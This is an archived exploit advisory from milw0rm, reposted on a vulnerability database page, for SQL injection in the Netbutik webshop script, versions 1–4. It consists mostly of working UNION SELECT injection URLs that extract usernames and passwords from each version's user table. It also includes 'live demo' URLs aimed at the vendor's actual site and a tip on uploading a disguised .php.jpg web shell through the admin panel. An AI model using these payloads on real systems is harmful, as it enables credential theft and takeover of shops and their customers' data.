Netbutikker 4 - SQL Injection

🗓️ 21 May 2008 00:00:00Reported by Mr.SQLType
Netbutik 4 - SQL Injection vulnerability in versions 1, 2, 3, and 4. Exploitable in multiple URLs.
#############   Viva Islam   ####################
# rEm0te SQL Injection Vulnerability 
#                                       
# netbutik ( V1 ) (( index.php id ))
#                                       
#########################################

## Script Name : Netbutik 

## Download : www.simpelside.dk

## Version : version [ 1 , 2 , 3 ,4 ]

#########################################

## AuTh0r : Mr.SQL

## H0ME  : WwW.PaL-HaCkEr.CoM

## Email  :  [email protected]

###################################################################################

## Note ## This script have (4) version on demo and users table have diffrents names you can see that in exploits
For using exploit on sites which using software plz use your mind to have good results.
  

##  (()) -(:: SQL ::)- (())

version number [1]
                  1  =====>> http://www.target.dk/netbutik1/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik1_brugere/*
                  2  =====>> http://www.target.dk/netbutik1/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik1_brugere/*


version number [2]
                  1 ======>>http://www.target.dk/netbutik2/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik2_brugere/*
                  2 ======>>http://www.target.dk/netbutik2/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik2_brugere/*	
		
  
version number [3]
                  1 ======>>http://www.target.dk/netbutik3/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik3_brugere/*
                  2 ======>>http://www.target.dk/netbutik3/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik3_brugere/*


version number [4]
                  1 ======>>http://www.target.dk/netbutik4/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik4_brugere/*
                  2 ======>>http://www.target.dk/netbutik4/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere/*			
	
			  
(#####) must be using all test all exploits for know any version runing on target site 				  


##  .::. liVe DeMO .::.


##  http://www.simpelside.dk/netbutik1/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik1_brugere/*

##  http://www.simpelside.dk/netbutik2/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik2_brugere/*

##  http://www.simpelside.dk/netbutik3/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik3_brugere/*

##  http://www.simpelside.dk/netbutik4/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere/*


###################################################################################


  #######################################
## Note:: YOU can upload your Ev!l code  ADMIN CP  (( .php.jpg ))
## Fr0m /admin/admin_edit_products.php                                              
  #######################################


###################################################################################
###################################################################################

<< Gr33Tz>>  (( HaCkEr-EGy )) :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: (( MuslimS HaCkErS ))

###################################################################################
###################################################################################
                                                                            -(:::: Geek Inj3cT0r ::::)-

# milw0rm.com [2008-05-21]
21 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4